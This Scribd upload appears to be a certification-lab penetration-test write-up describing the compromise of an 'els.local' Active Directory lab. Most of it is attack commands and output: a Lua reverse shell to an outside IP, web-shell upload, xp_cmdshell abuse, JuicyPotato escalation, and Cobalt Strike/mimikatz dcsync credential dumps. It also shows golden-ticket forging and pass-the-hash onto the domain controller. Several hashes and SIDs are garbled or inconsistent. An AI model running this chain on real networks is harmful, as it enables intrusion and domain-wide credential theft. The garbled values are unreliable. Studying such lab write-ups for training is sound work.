Scribd
Upload
961 views

E CPTX

1. The document details the steps taken during a penetration test to access various internal systems and escalate privileges. Key steps include opening remote shells, downloading tools, exploiting default credentials, dumping password hashes from a database, creating golden tickets, and accessing domain controllers. The goal was to achieve domain administration access.

Uploaded by

pluto
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
961 views

E CPTX

1. The document details the steps taken during a penetration test to access various internal systems and escalate privileges. Key steps include opening remote shells, downloading tools, exploiting default credentials, dumping password hashes from a database, creating golden tickets, and accessing domain controllers. The goal was to achieve domain administration access.

Uploaded by

pluto
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 13

1. 10.100.11.

101

1 – I opened the https://172.16.80.100


2 – add this code

local host, port = "175.12.80.12", 1111 local socket = require("socket")


local tcp = socket.tcp() local io = require("oi") tcp:connect(host, port);
while true do local cmd, status, partial = tcp:receive() local f =
io.popen(cmd, 'w') local s = f:read("a") f:close() tcp:send(s) if status ==
"closed" then break end end tcp:close()

This gave me a shell access

Downloaded and executed my beacon

Create socks and use proxychains

Found UAT Helpdesk App.url


Which contained the following URL http://uat-helpdesk.els-child.els.local/admin/default.aspx
2. 10.100.11.100
The server at http://10.100.11.100 include admin panel with admin:admin
credentials

From there upload shell

Dump data you get user manager1 with password Compl3xP@ssword

3. 10.100.11.150

Use manager1 to contact 10.100.11.150/admin/default.aspx


Used “uatoperator” account against 10.100.11.150

[11:16:47] root:examples git:(master) # proxychains mssqlclient.py


[email protected]

ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
SQL> enable_xp_cmdshell
[*] INFO(UATSERVER\DB1): Line 185: Configuration option 'show
advanced options' changed from 1 to 1. Run the RECONFIGURE statement
to install.

Document Classification: Confidential

[*] INFO(UATSERVER\DB1): Line 185: Configuration option


'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to
install.
SQL> xp_cmdshell whoami
output

--------------------------------------------------------------------
---

---------

nt service\mssql$db1
NULL
SQL>

Execute comands

Escalate with juicypotto

JuicyPotato.exe -l 1111 -p c:\users\payload.exe -t * -c {8BA3F05E- D86B-


21D0-A075-01C04FB68820}
Dump passwords from db
4. 10.100.11.250

Using the admin credentials I got from the db

11
To gain access to jumbox over wmic

Impersonated uat operator using make_token


Then started webserver at win10-server machine to host my payloads And started to execute
commands at jumpbox via invoke-command

12

beacon> link JUMPBOX.ELS-CHILD.ELS.LOCAL


[*] Tasked to link to 'JUMPBOX.ELS-CHILD.ELS.LOCAL' [+] host called
home, sent: 56 bytes
[+] established link to child beacon: 10.100.10.250

After gaining the shell access I tried to escalate my privs and managed to do so via reading
unattended install file which gave me administrator
5. 10.100.10.253

From jumpbox (10.100.11.100) and using uatoperator I started to execute commands over
wmi

I started webserver at jumpbox to host the payloads

I started to view the registry and found user administrator : B@dR3gistry

16 used it to escalate and dump hashes


beacon> dcsync els-child.els.local els-child\krbtgt
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:els-
child.els.local /user:els-child\krbtgt command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] 'els-child.els.local' will be the domain
[DC] 'child-dc01.els-child.eLS.local' will be the DC server
[DC] 'els-child\krbtgt' will be the user account

Object RDN

** SAM ACCOUNT **

: krbtgt

SAM Username
Account Type
User Account Control : Account expiration : Password last change :
Object Security ID : Object Relative ID : 502

Credentials: Hash NTLM: ntlm- 0: lm - 0:

e4ba51c7157fe411po603b661f1ccfbe e4ba51c7111fe46652603b661f1ccfbe
1389eb4be52e304d1a753a704187dd66

: krbtgt
: 30000000 ( USER_OBJECT )

00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT ) 11/3/2017 9:11:28 AM

S-1-5-21-235po937-599822933-351157107-502

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *

Default Salt : ELS-CHILD.ELS.LOCALkrbtgt Default Iterations : 4096


Credentials

aes256_hmac (4096) :
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9

aes128_hmac (4096) : 6031a48480cc6db341758e230e6d des_cbc_md5 (4096)


: 312a6bdfb09276c7

* Primary:Kerberos *
Default Salt : ELS-CHILD.ELS.LOCALkrbtgt Credentials

des_cbc_md5 : 312a6bd1j0276c7 * Packages *

Kerberos-Newer-Keys
* Primary:WDigest *
01 1cf79ec9db39ca3ui8979d9cca4bdef2
.................................. 28
829bb53e575583c3io7f40aabf43f05 29 0696af48622e71a7oi7cccc94c95d1b

6. 10.100.10.254

To gain access to the parent domain DC, I created a golden ticket using the krbtgt I got before
for my user adding him to the enterprise admins group

beacon> mimikatz kerberos::golden /user:admin1 /krbtgt:


1cf79ec9db39ca3ui8979d9cca4bdef2 /domain:els-child.els.local /sid:S-
1-5-21-23589937-1851e4348-351157107 /sids:S-1-5-21-22511948-
1856962338-1851e4348-519 /ticket:golden.ticket
[*] Tasked beacon to run mimikatz's kerberos::golden /user:admin1
/krbtgt: 1cf79ec9db39ca3ui8979d9cca4bdef2 /domain:els-
child.els.local /sid:S-1-5-21-23511937-599888933-351157107 /sids:S-
1-5-21-2128511948- 1856962338-15222442862-519 /ticket:golden.ticket
command

[+] host called home, sent: 998474 bytes [+] received output:

User
Domain
SID
User Id
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2128511948-1851e4348-1523442862-519 ;
ServiceKey: 1cf79ec9db39ca3ui8979d9cca4bdef2 - rc4_hmac_nt
Lifetime : 10/29/2019 5:08:32 PM ; 10/26/2029 5:08:32 PM ;
10/26/2029 5:08:32 PM

-> Ticket : golden.ticket

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !

: admin1
: els-child.els.local (ELS-CHILD)
: S-1-5-21-23589937-1851e4348-351157107 : 500

admin beacon> dcsync els.local els\krbtgt


[*] Tasked beacon to run mimikatz's @lsadump::dcsync
/domain:els.local /user:els\krbtgt command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] 'els.local' will be the domain
[DC] 'lab-dc01.eLS.local' will be the DC server
[DC] 'els\krbtgt' will be the user account

Object RDN

** SAM ACCOUNT **

SAM Username Account Type

User Account Control


Account expiration
Password last change
Object Security ID
Object Relative ID

: krbtgt

: krbtgt
: 30000000 ( USER_OBJECT )

: 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )


:
: 9/7/2017 1:06:33 PM
: S-1-5-21-2128511948-1856962338-1523442862-502 : 502

Credentials: Hash NTLM: ntlm- 0: lm - 0:

d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
f4f88438c968756e75252ca4056b0607
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9

Document Classification: Confidential

19

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *

Default Salt : ELS.LOCALkrbtgt Default Iterations : 4096 Credentials

aes256_hmac (4096) :
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9

aes128_hmac (4096) :
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
des_cbc_md5 (4096) : 57fb67328f4651a7

* Primary:Kerberos *
Default Salt : ELS.LOCALkrbtgt Credentials
des_cbc_md5 :
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9 *
Packages *

Kerberos-Newer-Keys

* Primary:WDigest *
01 b4e712be7d587a19fe5b18b07a7ff799 ...........................
29 e1ac403d7b274c3d8c2e2c2d40ab7ccc

beacon> dcsync els.local els\administrator


[*] Tasked beacon to run mimikatz's @lsadump::dcsync
/domain:els.local /user:els\administrator command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] 'els.local' will be the domain
[DC] 'lab-dc01.eLS.local' will be the DC server
[DC] 'els\administrator' will be the user account

Object RDN

** SAM ACCOUNT **

SAM Username

Account Type
User Account Control :

Account expiration
Password last change
Object Security ID
Object Relative ID

:
:
:
: 500

Credentials: Hash NTLM: ntlm- 0: ntlm- 1: lm - 0:

: Administrator
: Administrator
: 30000000 ( USER_OBJECT )

00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD ) 10/30/2017 9:21:01 AM

S-1-5-21-2128511948-1856962338-1523442862-500

49623ccc820121223b3f0f571b77186

Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : ELS.LOCALAdministrator Default Iterations : 4096
Credentials

Used administrator hash to gain access to the parent domain’s DC

beacon> pth els\administrator 49623ccc820121223b3f0f571b77186


[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:administrator
/domain:els /ntlm: 49623ccc820121223b3f0f571b77186/run:"%COMSPEC% /c
echo 749c6eaf8a2 > \\.\pipe\56de86" command
[+] host called home, sent: 746598 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : administrator
domain : els
program : C:\Windows\system32\cmd.exe /c echo 749c6eaf8a2 >
\\.\pipe\56de86
impers.: no
NTLM : 49623ccc820121223b3f0f571b77186

| PID 2052
| TID 2676
| LSA Process is now R/W
| LUID 0 ; 1632426 (00000000:0018e8aa)
\_ msv1_0 - data copy @ 0000004BBB9CA130 : OK ! \_ kerberos - data
copy @ 0000004BBB97F318

• \_ aes256_hmac -> null


• \_ aes128_hmac -> null \_ rc4_hmac_nt OK
\_ rc4_hmac_old OK

\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 0000004BBB9745C8 (16) -> null

beacon> ls \\lab-dc01.els.local\c$
[*] Tasked beacon to list files in \\lab-dc01.els.local\c$ [+] host
called home, sent: 41 bytes
[*] Listing: \\lab-dc01.els.local\c$\

Size Type ---- ----

dir

Last Modified Name ------------- ----

03/18/2014 03:33:36

$Recycle.Bin

bootmgr BOOTNXT milestone.txt pagefile.sys


beacon> wmi lab-dc01.els.local smb
[*] Tasked beacon to run windows/beacon_smb/bind_pipe (\\lab-

dc01.els.local\pipe\status_6321) on lab-dc01.els.local via WMI


[+] host called home, sent: 208972 bytes
[-] Could not connect to pipe (\\lab-dc01.els.local\pipe\status_6321):
2 [+] established link to child beacon: 10.100.10.254

beacon> shell type milestone.txt


[*] Tasked beacon to run: type milestone.txt

[+] host called home, sent: 73 bytes


[*] started download of C:\milestone.txt (97 bytes)
[*] download of milestone.txt is complete
[+] received output:
It seems like i hacked the domain, by just compromising
elearnsecurity’s moderator’s ass. How cool is that?
beacon> shell hostname
[*] Tasked beacon to run: hostname
[+] host called home, sent: 39 bytes
[+] received output:
lab-dc01

beacon> shell ipconfig


[*] Tasked beacon to run: ipconfig

[+] host called home, sent: 39 bytes [+] received output:

Windows IP Configuration
Ethernet adapter Ethernet0:

Connection-specific DNS Suffix . :


Link-local IPv6 Address . . . . . : fe80::5574:a356:2968:b78b%12 IPv4
Address. . . . . . . . . . . : 10.100.10.254
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.100.10.1

You might also like